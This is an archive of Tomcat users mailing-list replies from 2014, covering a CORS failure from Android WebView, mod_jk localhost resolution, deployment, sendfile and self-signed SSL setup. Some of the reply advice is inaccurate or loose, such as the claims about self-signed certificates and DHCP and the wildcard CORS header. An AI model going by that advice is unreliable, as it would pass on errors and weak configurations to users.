  Have you tried disabling or removing the CORS filter when you're testing
  from the Android device? The flowchart in the Tomcat CORS documentation
  indicates that the filter will attempt to validate the origin before it
  determines whether or not it is allowed. Apparently, the file scheme is not
  considered valid.

MGreferencing the request processing flowchart at
MGhttps://tomcat.apache.org/tomcat-7.0-doc/images/cors-flowchart.png
MGyou will need to carefully shepherd your request thru TC 
Valve/Filter/ServletProcessing gauntlet
MGdid you supply a valid origin header?
MGhttp://en.wikipedia.org/wiki/List_of_HTTP_header_fields
MGdid you supply a valid request method e.g. POST/GET?
MGAndroid is a much diffferent User-agent than Browser and you will need to 
set the request headers properly
MGHttpConnection httpConn = null;
try {
  // Open an HTTP Connection object
  httpConn = 
(HttpConnection)Connector.open(http://LOCALHOST:8080/services/getdata);
  // Setup HTTP Request to POST
  httpConn.setRequestMethod(HttpConnection.POST);
  httpConn.setRequestProperty(User-Agent,
   ???);
http://www.useragentstring.com/pages/Mobile%20Browserlist/
MG

  Hope that helps.
 
  -Terence Bandoian
 
 
 
 
 
  On Fri, Apr 25, 2014 at 1:36 AM, Terence M. Bandoian tere...@tmbsw.com
  wrote:
 
  On 4/24/2014 1:14 PM, Jose María Zaragoza wrote:
 
  2014-04-24 19:00 GMT+02:00 Terence M. Bandoian tere...@tmbsw.com:
 
  On 4/22/2014 1:37 PM, Jose María Zaragoza wrote:
 
  -- Forwarded message --
  From: Terence M. Bandoian tere...@tmbsw.com
  Date: 2014-04-22 20:12 GMT+02:00
  Subject: Re: CORS issue with Tomcat and Android Webview
  To: Tomcat Users List users@tomcat.apache.org
 
 
  On 4/22/2014 11:03 AM, Ankit Singhal wrote:
 
  Also we tried to give the same call from Android App to some
  different
  Node
  server and things worked fine. So it seems some problem with Tomcat
  only.
 
  A silly question:
 
  What does it have to do Tomcat's CORS support with W3C Widget Access
  specification ?
 
  I have no idea about Phonegap but it looks like that it prefers to
  follow that specification for managing requests to different domains ,
  right ?
 
 
  Hi, Jose-
 
  The request/response headers in the original post were difficult for me
  to
  follow but basically, requests to Tomcat are successful when tested
  with
  Chrome (desktop? laptop? server? same as Tomcat?) and unsuccessful when
  tested from an Android device. What are the differences between the two
  environments? Do those differences have any effect on request
  processing
  by
  the Tomcat CORS filter? If it were me, I'd find out.
 
  Well , I have no idea, but according this page
 
  http://www.html5rocks.com/en/tutorials/cors/
 
  if Content-Type is application/json , then request is a not simple
  request ( sic. ) and it requires a OPTIONS preflight request (
  including Origin header)
  And Once the preflight request gives permissions, the browser makes
  the actual request
 
  First case (Chrome browser) did but, but the second didn't
 
  Are you test to change the Content-Type ?
 
  Regards
 
 
  Hi, Jose-
 
  From the page you cited:
 
  The use-case for CORS is simple. Imagine the site alice.com has some
  data that the site bob.com wants to access. This type of request
  traditionally wouldn’t be allowed under the browser’s same origin policy.
  However, by supporting CORS requests, alice.com can add a few special
  response headers that allows bob.com to access the data.
 
  In this case, alice.com would be the server that hosts Tomcat. As you
  suggest, the problem may very well be in the client but - FOR ME - it's
  worth the effort to understand what should happen on both the client and
  the server and to ensure that both are configured correctly.
 
  -Terence Bandoian
 
 
 
 
  On Tue, Apr 22, 2014 at 9:22 PM, Ankit Singhal
 
  ankising...@gmail.comwrote:
 
  Hi All
 
 
 
  I am facing a strange problem with Tomcat 8 and CORS. I am
  developing
  a
  Hybrid web app using ionicframework, AngularJS, Cordova as front end
  and
  Tomcat 8 and Spring 3 as back-end.
 
 
 
  For easy development I am testing the 

RE: CORS issue with Tomcat and Android Webview

[Martin Gainty]

  


 From: demablo...@gmail.com
 Date: Sat, 26 Apr 2014 13:56:43 +0200
 Subject: Re: CORS issue with Tomcat and Android Webview
 To: users@tomcat.apache.org
 
 2014-04-26 13:16 GMT+02:00 Martin Gainty mgai...@hotmail.com:
  Date: Sat, 26 Apr 2014 11:43:05 +0530
  Subject: Re: CORS issue with Tomcat and Android Webview
  From: ankising...@gmail.com
  To: users@tomcat.apache.org
 
  On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian 
  tere...@tmbsw.comwrote:
 
   On 4/24/2014 11:16 PM, Ankit Singhal wrote:
  
   Hi
  
   I did more research on this and figure out the issue.If you see the
   headers
   from Android and look into Origin Header.
  
   Origin: file://
  
   Tomcat CORS filter tries to validate the URI in Origin header and
   considers
   file:// as an invalid URI and returns back 403.
  
   I have applied accept-origin*/accept-origin params. So shouldn't 
   CORS
   filter honor this ?
  
   I agree that Client also has the problem , but still server should also
   allow...
  
 
 Hi:
 
 I'm watching this flowchart
 https://tomcat.apache.org/tomcat-7.0-doc/images/cors-flowchart.png
 
 and I wonder if Tomcat 7 checks if the request received belongs to the
 right type.
 I mean, if browser sends a simple request ( eg. POST + application/xml
 content-type header )
 WC3 spec says that request should be a preflight request , does
 Tomcat check this case ?
 
MGyou will need to set the Access-Allow-Origin to * and Content-Type to 
application/xml
public void doPost(HttpServletRequest req, HttpServletResponse resp) {
  resp.addHeader(Access-Control-Allow-Origin, *);
  resp.addHeader(Content-Type, application/xml);
  resp.getWriter().append(csvString);
}MG
 
 
 Regards
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work

[Martin Gainty]

  


 Date: Sat, 5 Apr 2014 06:57:23 -0400
 From: dcker...@verizon.net
 To: users@tomcat.apache.org
 Subject: Re: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work
 
 ...
 
  but
  if the server is a *nix implementation, the better diag tool
  might be dig. And yes, I would not expect the address 0.0.0.0
  on a client to connect to the localhost. That is a special
  case address
  meaning
  local network. If anything, it would be sending packets out
  the NIC card, not via loopback.
  0.0.0.0 means all IPv4 interfaces available and only applies
  for binding a server socket. You can never connect to 0.0.0.0
  as a client.
 
  Chris - It actually has a different meaning based on use. For
  binding to a socket in the local IP stack, it means what you
  say. In the routing table, it means the default route. In
  firewalls/routers, it probably means something completely
  different. When used as a destination address, it means what I
  said. How the IP stack/hardware deals with it is dependent on
  the implementation. The RFCs specify that it should be treated
  the same as the broadcast address, but local network only, and
  not routable. That may be for received packets only, as I've
  seen other references that it should never be used on-the-wire,
  unless as the source address in protocols like DHCP. In any
  event, definitely not expect the 0.0.0.0. address to get any
  response, either local host or otherwise. For the OP's specific
  problem, s/he need to see how localhost is resolving. Most
  systems define it in the local hosts file, either /etc/hosts
  (*nix) or c:\Windows\system32\etc\hosts. Not sure for other
  systems. Jeff
  Make that C:\Windows\system32\drivers\etc\hosts.
 
  I did a test and it appeared that ping didn't rely on the entry
  being there, but it could have been a cached result.
  Way back in the day when I had the misfortune to use Windows regularly
  for stuff like this, I seem to recall that almost nothing short of a
  reboot would cause the hosts file to be re-read.
 
  - -chris
 
 
  If I remember correctly, the Windows resolver cache may be cleared from
  a command prompt with ipconfig and that should include entries from the
  hosts file. Seems like I may have had to restart the browser though to
  see any changes to the hosts file.
 
 ipconfig /flushdns

MG
ipconfig/flushdns *should* flush the ips and the dns entries 
to test use a browser that doesnt cache dns entries (like firefox) go to 
address bar

 

about:config
network.dnsCacheExpirationGracePeriod


http://kb.mozillazine.org/Network.dnsCacheExpiration

 

hth,
Martin 
MG
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work

[Martin Gainty]

 From: jeffrey.jan...@polydyne.com
 To: users@tomcat.apache.org
 Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work
 Date: Fri, 4 Apr 2014 17:33:08 +
 
  -Original Message-
  From: Jeffrey Janner [mailto:jeffrey.jan...@polydyne.com]
  Sent: Friday, April 04, 2014 12:10 PM
  To: 'Tomcat Users List'
  Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does
  not work
  
   -Original Message-
   From: Jeffrey Janner [mailto:jeffrey.jan...@polydyne.com]
   Sent: Friday, April 04, 2014 12:04 PM
   To: 'Tomcat Users List'
   Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does
   not work
  
-Original Message-
From: Christopher Schultz [mailto:ch...@christopherschultz.net]
Sent: Friday, April 04, 2014 10:23 AM
To: Tomcat Users List
Subject: Re: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis
does not work
   
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
   
Jeffrey,
   
On 4/4/14, 10:50 AM, Jeffrey Janner wrote:
 -Original Message- From: André Warnier [mailto:aw@ice-
sa.com]
 Sent: Thursday, April 03, 2014 5:27 PM To:
 Tomcat Users List Subject: Re: AW: AW:
 tomcat-connectors-1.2.39-windows-x86_64-iis does not work

 Christopher Schultz wrote:
 -BEGIN PGP SIGNED MESSAGE- Hash: SHA256

 André,

 On 4/3/14, 3:34 PM, André Warnier wrote:
 Alten, Jessica-Aileen wrote:
 -Ursprüngliche Nachricht- Von: André Warnier
 [mailto:a...@ice-sa.com] Gesendet: Donnerstag, 3. April
 2014 15:36 An: Tomcat Users List Betreff: Re: AW:
 tomcat-connectors-1.2.39-windows-x86_64-iis does not work

 Alten, Jessica-Aileen wrote:
 A bit guessing here :

 You have :
 worker.ajp13w.host=localhost
 and

 jk_open_socket::jk_connect.c (735): connect to
 0.0.0.0:8009
 failed
 (errno=49)
 is localhost == 0.0.0.0  ?

 From the point of view of mod_jk/isapi, should it not be
 127.0.0.1 ?
 Your answer points to the right direction. 0.0.0.0
 means: any configured IPv4-Address on this computer, see

 http://serverfault.com/questions/78048/whats-the-
  difference-


betwee
 n-
 ip
 -addre ss-0-0-0-0-and-127-0-0-1

 In principle this is ok at first. The Ajp13 Connector was
 configured in server.xml to listen at any IPv4 address on
   port
 8009 - which is the default setting.
 But the connector can't find any suitable
 address.
 The problem is: The new Tomcat-Connector can't parse
 worker.ajp13w.host=localhost, instead localhost must be
 replaced
 with 127.0.0.1, this works!

 In my eyes this is a big fat bug, because most
  documentation
 on workers use localhost. localhost is actually the
 default for
 the
 host connection directive.

 The new worker directive prefer_ipv6 doesn't change this
 behavior.

 Hi.

 Can you please really check this ?

 Open a command window on that server, and do ping
  localhost.
It
 should tell you what it understands by localhost. Copy and
 paste the result here :
 ping localhost

 Ping wird ausgeführt für xyz.uv.local [127.0.0.1] mit 32
  Bytes
 Daten: Antwort von 127.0.0.1: Bytes=32 Zeit1ms
 TTL=128 Antwort von 127.0.0.1: Bytes=32 Zeit1ms TTL=128
   Antwort
 von 127.0.0.1: Bytes=32 Zeit1ms TTL=128 Antwort von
  127.0.0.1:
 Bytes=32 Zeit1ms TTL=128

 Ping-Statistik für 127.0.0.1: Pakete: Gesendet = 4, Empfangen
 =
4,
 Verloren = 0 (0% Verlust), Ca. Zeitangaben in Millisek.:
   Minimum
=
 0ms, Maximum = 0ms, Mittelwert = 0ms


 That /is/ bizarre.  As far as I know, to resolve hostnames in
   its
 configuration, mod_jk/isapi is using the OS's resolver
  library,
the
 same as the one ping should be using. On the other hand, you
 say that if you have

 worker.ajp13w.host=localhost
 it doesn't work (mod_jk cannot connect to tomcat), but when
  you
 change this to

 worker.ajp13w.host=127.0.0.1
 then it works fine.

 Ok, another check in a command window (and I assume that you
   open
 this command window *on the server itself* where mod_jk and
 Tomcat are running, right ?)

 test :

 1) telnet localhost 8009

 2) telnet 127.0.0.1 8009

 Any difference between these 2 cases ?

 If not, then indeed it looks like a mod_jk/isapi_redirect
 1.2.39 problem.

 In any case, you cannot connect to 0.0.0.0, as this log line
 would suggest :

 jk_open_socket::jk_connect.c (735): connect to
 0.0.0.0:8009
 failed

 Could this be an interaction between IPv4 and IPv6? Try:

 C: nslookup localhost

 You might get only 127.0.0.1 or you might also get :: (or
 something equivalent). 

RE: How to deploy Java application into Tomcat in Linux

[Martin Gainty]

  


 From: randhir.si...@sterlite.com
 Date: Tue, 1 Apr 2014 10:43:28 +0530
 Subject: How to deploy Java application into Tomcat in Linux
 To: users@tomcat.apache.org
 
 Hi,
 
 
 
 As per my understanding, the steps to deploy a Java application on Tomcat
 (5.X/6.X) in Linux would be as follows:
 
 
 
 1) Install Tomcat on Linux
 
 2) Add a host entry in $TOMCAT_HOME/conf with the syntax like-
 
 -
 
 Host name=xxx.co.in debug=0
 appBase=/opt/setuponm/jakarta-tomcat-5.0.28/sterlite/reportstool 
 unpackWARs=false autoDeploy=false

MGUnfortunately that Host designation wont work.. try
  Host name=www.tomcatexpert.com  appBase=webapps
unpackWARs=true autoDeploy=false
MG 
 Aliasreports.fion.co.in/Alias
 
 
 
 Context path=
 docBase=/opt/setuponm/jakarta-tomcat-5.0.28/sterlite/reportstool debug=0
 
 reloadable=false crossContext=false /
 
 
 
 
 
 
 
 
 The above code would assign the host name to access the URL, gives the
 location of the web application pointed out by appBase  context path.
 
 
 
 3) Start Tomcat.
 
 
 
 Please let me know if the steps above are correct and also please let me
 know in detail if the steps are not correct.
 
 -- 
 
 *STL Disclaimer:*
 The content of this message may be legally privileged and confidential and 
 are for the use of the intended recipient(s) only. It should not be read, 
 copied and used by anyone other than the intended recipient(s). If you have 
 received this message in error, please immediately notify the sender, 
 preserve its confidentiality and delete it. Before opening any attachments 
 please check them for viruses and defects. No employee or agent is 
 authorised to conclude any binding agreement on behalf of Sterlite 
 Technologies Limited with another party by email without express written 
 confirmation by authorised person. Visit us at www.sterlitetechnologies.com 
 Please consider environment before printing this email !
 
 
 
 
  

RE: catalina-ant reload task doesn't work

[Martin Gainty]

$/CATALINA_HOME/conf/server.xml
autoDeploy=true

https://tomcat.apache.org/tomcat-6.0-doc/config/host.html

 

?
Martin

_


  



 Date: Fri, 28 Mar 2014 18:21:42 -0700
 Subject: catalina-ant reload task doesn't work
 From: catph...@catphive.net
 To: users@tomcat.apache.org
 
 Using the tasks from the example ant script at:
 http://tomcat.apache.org/tomcat-8.0-doc/appdev/build.xml.txt
 
 I have can deploy and undeploy from ant. However, the reload task doesn't
 seem to do anything.
 
 I make changes to java and html files, run ant reload which triggers the
 reload task. Ant reports success. I browse to the site and my changes
 aren't reflected. undeploy followed by deploy works.
 
 Am I not understanding what reload is supposed to do, or is there a
 different task that makes more sense to use?
  

RE: NoClassDefFoundError using catalina ant deploy task

[Martin Gainty]

no bugs..just ...'undocumented features'


glad you found the solution!
Martin 
__

  



 Date: Fri, 28 Mar 2014 17:51:08 -0700
 Subject: Re: NoClassDefFoundError using catalina ant deploy task
 From: catph...@catphive.net
 To: users@tomcat.apache.org
 
 I investigated more and found the solution... It seems like a doc bug in
 that the tutorial doesn't tell you everything you need to do to get deploy
 to work.
 
 tomcat-util.jar needs to be placed in ~/.ant/lib. The tutorial says to
 place catalina-ant.jar there, but doesn't mention tomcat-util.jar.
 
 The user needs the manager-script role for deploy to succeed. The tutorial
 doesn't mention this.
 
 Overall the appdev tutorial is pretty problematic because it doesn't really
 include a complete example and seems to have kind of random organization.
 
 
 On Fri, Mar 28, 2014 at 4:41 PM, Brendan Miller catph...@catphive.netwrote:
 
  I was going through the tomcat docs and trying to use the default
  build.xml file provided by the appdev tutorial to deploy my war to tomcat.
 
  Example build.xml:
  http://tomcat.apache.org/tomcat-8.0-doc/appdev/build.xml.txt
 
  However, when I use the deploy task I always get
  a java.lang.NoClassDefFoundError:
  org/apache/tomcat/util/codec/binary/Base64 error.
 
  I've copied the relevant code here:
  https://gist.github.com/catphive/9845270
 
  I've verified that tomcat-util.jar, which contains Base64.cass, is on the
  path, compile.classpath, passed to taskdef.
 
  I'm just trying to do a basic tomcat tutorial, and getting this deploy
  task to run is hanging me up. Any ideas what could be doing wrong? Are
  these deploy tasks broken somehow?
 
  Brendan
 
  

RE: SSO

[Martin Gainty]

When you say Linux I assume you are implementing Red Hat Enterprise Linux SSO


https://access.redhat.com/site/documentation/en-US/Red_Hat_Enterprise_Linux/5/html/Deployment_Guide/sso-ov.html


Martin 
__ 
Please do not alter or disrupt this email transmission...Thank You

  



 From: yossi.br...@sap.com
 To: users@tomcat.apache.org
 Subject: SSO
 Date: Sun, 23 Mar 2014 07:37:41 +
 
 
 Hi to all ,
 
 I am trying to install SSO on Linux machine with Tomcat in order to working 
 with Jenkins without the needed to login, any idea ?
 
 Thanks a lot ,
 Yos
 
  

RE: help with setting up proxy

[Martin Gainty]

  


 From: hardikvaish...@gmail.com
 Date: Sat, 22 Mar 2014 22:32:11 -0400
 Subject: Re: help with setting up proxy
 To: users@tomcat.apache.org
 
 Here is the example of what I am trying to do.
 
 JBoss Webserver Private IP : 192.168.10.100
 JBoss Webserver Public IP 172.x.x.x
 
 Server connected to Jboss: 192.168.10.101  192.168.10.102
 
 If I am on the Jboss machine I can access 192.168.10.101\abc\test.html
 If I am outside the network its not possible to access URL
 192.168.10.101\abc\test.html
 
 To solve the problem I have PAC file as a proxy for my browser which
 redirect all request for 192.168.10.101 address to apache httpd proxy
 server which sits inside the (192.168.x.x) network.
 
 Upto this point everything works OK. Request comes to Apache httpd server
 but it is not able to pass the url as is to 192.168.10.101\abc\test.html
 and return the response back to the client.

MG192.168.10.101 is only known to the machines obtaining their IP from that 
DHCP router 
MGThe router dynamically assigns 192.168.x.x to that machine at that point in 
time
MGNo machine outside that routers network would ever know about those dynamic 
IPs
MGThis is a Network issue... please contact your Net Admin

 thanks,
 -Hardik
 
 
 On Sat, Mar 22, 2014 at 2:04 PM, Hardik Vaishnav
 hardikvaish...@gmail.comwrote:
 
  Sorry my bad. I am talking about Apache httpd server.
 
 
  On Mar 22, 2014 12:29 PM, Hassan Schroeder hassan.schroe...@gmail.com
  wrote:
 
  On Sat, Mar 22, 2014 at 9:18 AM, Hardik Vaishnav
  hardikvaish...@gmail.com wrote:
 
   I am trying to configure Apache Tomcat as a proxy server.
 
   I hope I am not confusing everybody.
 
  I think perhaps you are confusing yourself. Tomcat has no intrinsic
  proxy server capability to configure. Are you thinking of the Apache
  httpd server?
 
  --
  Hassan Schroeder  hassan.schroe...@gmail.com
  http://about.me/hassanschroeder
  twitter: @hassan
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
  

RE: Effects of turning off sendFile in the NIO connector

[Martin Gainty]

  


 Date: Sat, 22 Mar 2014 14:24:01 -0400
 Subject: Effects of turning off sendFile in the NIO connector
 From: tomcat.ran...@gmail.com
 To: users@tomcat.apache.org
 
 What effect would setting useSendfile=false have on a web application using
 the NIO connector? I'm asking because I may want to use gzip compression in
 the connector. The docs state:
 
 *There is a tradeoff between using compression (saving your bandwidth) and
 using the sendfile feature (saving your CPU cycles). If the connector
 supports the sendfile feature, e.g. the NIO connector, using sendfile will
 take precedence over compression. The symptoms will be that static files
 greater that 48 Kb will be sent uncompressed.*
 
 It's trivial that adding compression uses CPU cycles, but does that imply
 that turning sendFile off even without enabling compression would increase
 CPU cycles? It's worth mentioning that the site serves a large (8mg) SWF
 file. I believe that was one of the pluses of NIO/sendFile, that it was
 good with sending large files under heavy traffic?

MGwhen you enable sendfile support with request attr  
org.apache.tomcat.sendfile.support = true
MGYou will need to set these 3 header attributes

org.apache.tomcat.sendfile.filename: Canonical filename of the file which will 
be sent as a String 
org.apache.tomcat.sendfile.start: Start offset as a Long 
org.apache.tomcat.sendfile.end: End offset as a Long 
MGhtitps://tomcat.apache.org/tomcat-6.0-doc/aio.html 

MGCompression:
MGset compression=on @ Connector
MGhttps://tomcat.apache.org/tomcat-7.0-doc/config/http.html

MGI did not read that TC cannot use sendfile with any compressed Stream?
MGcan you show us the URL?
MGThanks

 We also only really need compression on XML data, the site has minimal
 HTML, SWF's don't really benefit from gzip and some binary data we send
 back and forth is already compressed. I could manually implement
 compression on XML at the application level and within the SWF, if turning
 off sendFile will have negative consequences.
 
 Tomcat 7.0.42
 RHEL6
 ~4T outbound traffic/day
 
 Best,
 John
  

RE: jax-ws and tomcat 7 with ssl

[Martin Gainty]

i assume they copied OptionalPrefixcacerts $JAVA_HOME\jre\lib\security?


make sure validation dates are correct for Certificate
a self-signed cert is designed to work on the machine where you created the 
cert only *CN*
to implement a cert that will work on FQDN with correct dates you will need a 
REAL cert from verisign / thawte / DigiCert


Fixing PKIX Errors:

http://www.mkyong.com/webservices/jax-ws/suncertpathbuilderexception-unable-to-find-valid-certification-path-to-requested-target/

 

Making Self-Signed Certs

http://torlanglo.wordpress.com/2008/05/03/how-to-create-a-ssl-certificate-with-custom-domain-name-for-use-in-iis7-web-sites/

 

Get your 'REAL CERTS' here

http://safire.net/support/verisign.html


Martin 


  



 Date: Tue, 18 Mar 2014 17:58:32 -0400
 From: mariacristinasi...@sourcecable.net
 To: users@tomcat.apache.org
 Subject: jax-ws and tomcat 7 with ssl
 
 Hi,
 
 I developed a web service using jax-ws and configured Tomcat to support 
 SSL connection. Here are my steps:
 
 ** Step 1 - Generate a self-signed server certificate
 
 Use JDK 1.7 keytool:
 
 keytool -genkey -alias trackerdev -keypass changeit -storepass changeit 
 -keystore D:\Tomcat7\htdkeystore\trackerdev.ks –ext san=ip:xx.x.x.xxx
 
 Is CN=xx.x.x.xxx, OU=it, O=companynamehere, L=citynamehere, 
 ST=provincenamehere, C=ca correct?
 [no]: yes
 
 ** Step 2 – Configure Tomcat to support SSL connection
 
 On the dev server:
 
 Modify TOMCAT_HOME\conf\server.xml by adding the following block where 
 keystoreFile and keystorePass are set to values from the previous step:
 
 Connector port=8444 protocol=HTTP/1.1 SSLEnabled=true 
 maxThreads=150 scheme=https secure=true clientAuth=false 
 sslProtocol=TLS
 keystoreFile=htdkeystore/trackerdev.ks 
 keystorePass=changeit /
 
 ** Step 3 - Export the generated server certificate to a 
 certificate file
 
 On the dev server:
 
 keytool –export -alias trackerdev -storepass changeit –file 
 D:\Tomcat7\htdkeystore\serverdev.cer -keystore 
 D:\Tomcat7\htdkeystore\trackerdev.ks
 
 ** Step 4 - Import the server certificate into the truststore file 
 (Open an administrator cmd window and hit Shift, Ctrl, Enter)
 
 Copy serverdev.cer from the dev server and on the local machine:
 
 keytool –import –v –trustcacerts –alias trackerdev –file 
 C:\fromdevserver\serverdev.cer –keystore C:\Program 
 Files\Java\jdk1.7.0_51\jre\lib\security\cacerts -keypass changeit 
 -storepass changeit
 
 Trust this certificate? [no]: yes
 
 ** Step 5 – Modify webapps’s web.xml
 
 Add the following:
 listener
 listener-class
 com.sun.xml.ws.transport.http.servlet.WSServletContextListener
 /listener-class
 /listener
 servlet
 servlet-nametracker/servlet-name
 servlet-class
 com.sun.xml.ws.transport.http.servlet.WSServlet
 /servlet-class
 /servlet
 servlet-mapping
 servlet-nametracker/servlet-name
 url-pattern/tracker/url-pattern
 /servlet-mapping
 security-constraint
 web-resource-collection
 web-resource-namesecuredapp/web-resource-name
 url-pattern/tracker/url-pattern
 /web-resource-collection
 user-data-constraint
 transport-guaranteeCONFIDENTIAL/transport-guarantee
 /user-data-constraint
 /security-constraint
 
 ** MY QUESTION IS THIS:
 
 I tested the web service using https and it worked for me. I provided 
 another team with my server certificate so that they could add it to 
 their truststore file but I have no idea if they did or not. All I know 
 is that they got an error loading the wsdl. The exception they got was:
 
 Error loading [https://xx.x.x.xxx:8444/appname/tracker?wsdl]
 org.apache.xmlbeans.XmlException: javax.net.ssl.SSLHandshakeException:
 sun.security.validator.ValidatorException: PKIX path building failed:
 sun.security.provider.certpath.SunCertPathBuilderException: unable to 
 find valid certification path to requested target
 
 They claim that the certificate is not properly signed. Well, I don't 
 know. It is a self-signed certificate.
 
 Any ideas would help!
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52

[Martin Gainty]

Seema-
 
You've asked about 10 different questions on 10 different aberrancies on your 
upgrade
zip up the whole project up and stick it on driveway or any other free site

 

That way anyone building/running the code on TC7.0.52 can at least observe  
same behaviour you are experiencing
Martin --


  



 From: seema...@hotmail.com
 To: users@tomcat.apache.org
 Subject: RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52
 Date: Tue, 18 Mar 2014 14:10:19 +
 
 Any update on this Chris Schultz or anyone else? I know the images I added to 
 the email didn't show up, so if you want me to email them directly to you, I 
 can.
 Could really do with help on this, as it is not something I know much about.
 
 Thanks
 Seema
 
  From: seema...@hotmail.com
  To: users@tomcat.apache.org
  Subject: RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52
  Date: Fri, 14 Mar 2014 15:15:04 +
  
  
  
   Date: Fri, 14 Mar 2014 08:36:08 -0400
   From: ch...@christopherschultz.net
   To: users@tomcat.apache.org
   Subject: Re: HttpServletRequest Tomcat 5.5.29 to 7.0.52
   
   -BEGIN PGP SIGNED MESSAGE-
   Hash: SHA256
   
   Seema,
   
   On 3/14/14, 7:53 AM, Seema Patel wrote:
I have upgraded my tomcat (5.5.29 to 7.0.52) and Java (1.5 to 1.7)
for my struts servlet jsp application. I have also removed all
JCIFS authentication from the WEB-INF/web.xml file and have tried
to do BASIC authentication through Tomcat and the AD (it
authenticates me, but not sure if I've missed anything out, as I've
never done this before).
   
   One question at a time, please ;)
  
  Sorry for the off-loading of multiple questions :-)
  
   
I have a doFilter function in my code, which contains 
httpServletRequest.getServletPath() call. In the Tomcat 5.5.29 Java
1.5 version, this will work, as when I print 
httpServletRequest.getServletPath() i get the following:

P1_00.do P5_0_0.do P5_0_1.do

But in Tomcat 7.0.52 Java 1.7 I get the following from 
httpServletRequest.getServletPath() call:

P1_00.do P5_0_0.do P5_0_1.do includes/tab_defaultsettings.jsp 
includes/P1_00.do
   
   How are you printing this? Do you just have a Filter that wraps
   everything and dumps-out the ServletPath for every request? Can you
   post the code for that Filter as well as the filter and
   filter-mapping configuration you have in web.xml?
   
  
  I'm just doing a System.out.println() in the doFilter function in the 
  RequestFilter class to show which page it is. The doFilter function is:
  
  
  public void doFilter(ServletRequest request, ServletResponse response, 
  FilterChain chain) throws IOException, ServletException {
  if (request instanceof HttpServletRequest) {
  final HttpServletRequest httpRequest = (HttpServletRequest)request;
  final Object userBeanObject = 
  httpRequest.getSession().getAttribute(GenConstants.LOGGED_IN_USER_BEAN);
  final String pageName = httpRequest.getServletPath().replaceAll(/,);
  System.out.println(Request Page =  + httpRequest.getServletPath());
  if (unsecuredPages.contains(pageName)) {
  // don't need any protection
  chain.doFilter(request, response);
  } else if (!(userBeanObject instanceof UserBean)) {
  // no user bean in session do need one, invalidate session and redirect to 
  login
  if (httpRequest.getSession(false) != null) {
  httpRequest.getSession().invalidate();
  }
  ((HttpServletResponse)response).sendRedirect(logonPage);
  } else {
  final UserBean user = (UserBean) userBeanObject;
  MapString,LogicalOperation permissions = 
  (MapString,LogicalOperation)context.getAttribute(GenConstants.PERMISSIONS_MAP);
  if(permissions == null) {
  PermissionsUtil.setupPermissions(context);
  permissions = 
  (MapString,LogicalOperation)context.getAttribute(GenConstants.PERMISSIONS_MAP);
  }
  final LogicalOperation requiredOp = 
  permissions.get(pageName.replaceAll(\\.do,));
  if (user.isOperationAllowed(requiredOp)) {
  chain.doFilter(request, response);
  } else {
  if (httpRequest.getSession(false) != null) {
  httpRequest.getSession().invalidate();
  }
  ((HttpServletResponse)response).sendRedirect(logonPage);
  }
  }
  }
  }
  
  To give you a better idea of what was in the web.xml, here is what's been 
  taken out:
  
  filter
  filter-nameNtlmHttpFilter/filter-name
  filter-classjcifs.http.NtlmHttpFilter/filter-class
  init-param
  param-namejcifs.smb.client.soTimeout/param-name
  param-value3/param-value
  /init-param
  
  !-- always needed for preauthentication / SMB signatures --
  init-param
  param-namejcifs.smb.client.domain/param-name
  param-valueXXX.LOCAL/param-value
  /init-param
  !-- SMB message signing requires a valid existing login --
  init-param
  param-namejcifs.smb.client.username/param-name
  param-valueusername/param-value
  /init-param
  init-param
  param-namejcifs.smb.client.password/param-name
  param-valuepassword/param-value
  /init-param
  !-- Set the logging level --
  init-param
  

RE: tomcat-native libraries

[Martin Gainty]

  


 Date: Tue, 18 Mar 2014 19:57:57 +0530
 Subject: Re: tomcat-native libraries
 From: randeep...@gmail.com
 To: users@tomcat.apache.org
 
 On Tue, Mar 18, 2014 at 7:29 PM, Christopher Schultz 
 ch...@christopherschultz.net wrote:
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
 
  Randeep,
 
  On 3/18/14, 9:46 AM, Randeep wrote:
   On Tue, Mar 18, 2014 at 7:13 PM, Christopher Schultz 
   ch...@christopherschultz.net wrote:
  
   John,
  
   On 3/17/14, 9:52 AM, John Smith wrote:
  
  
   Installing the native library will make a difference.
   Whether the difference is large enough to notice depends
   very much on your application. If you want to improve your
   application's performance I suspect your time would be
   better spent with a profiler to see where the bottlenecks
   are in your application.
  
   Mark
  
  
   +1 I had the native APR installed and ended up removing it in
   favor of keeping things simple. The NIO connector often
   recommended by Chris S. and others works very well.
  
   It's also a big safer in that obscure problems rarely bring-down
   the JVM, whereas a bug in tcnative/apr/openssl can kill the entire
   JVM without warning.
  
   Using APR really only makes sense if you are using Tomcat directly
   as a web server that uses SSL, since there is a measurable
   difference between OpenSSL's performance and JSSE's performance.
  
   -chris
  
  
   Thank you Chris, In that case, I'm not going to use it. I was
   using httpd as front end to server ssl certificates. Now load
   balancer is handling it.
 
  Stick with the NIO connector. If you are using AJP to connect httpd to
  Tomcat, you will probably be better off with the BIO connector,
  actually. It's simpler and basically bug-free given its maturity.
  Since there is a 1:1 map between Tomcat and httpd connections, there's
  no really good reason to switch to another connector IMO.
 
  - -chris
 
 
 Chris,
 I'm not sure about what kind of connector I'm using. This ismy
 configuration.
 
 httpd-2.2.3-65.el5.centos + tomcat-connectors-1.2.28-src +
 tomcat-connectors-1.2.28-src
 
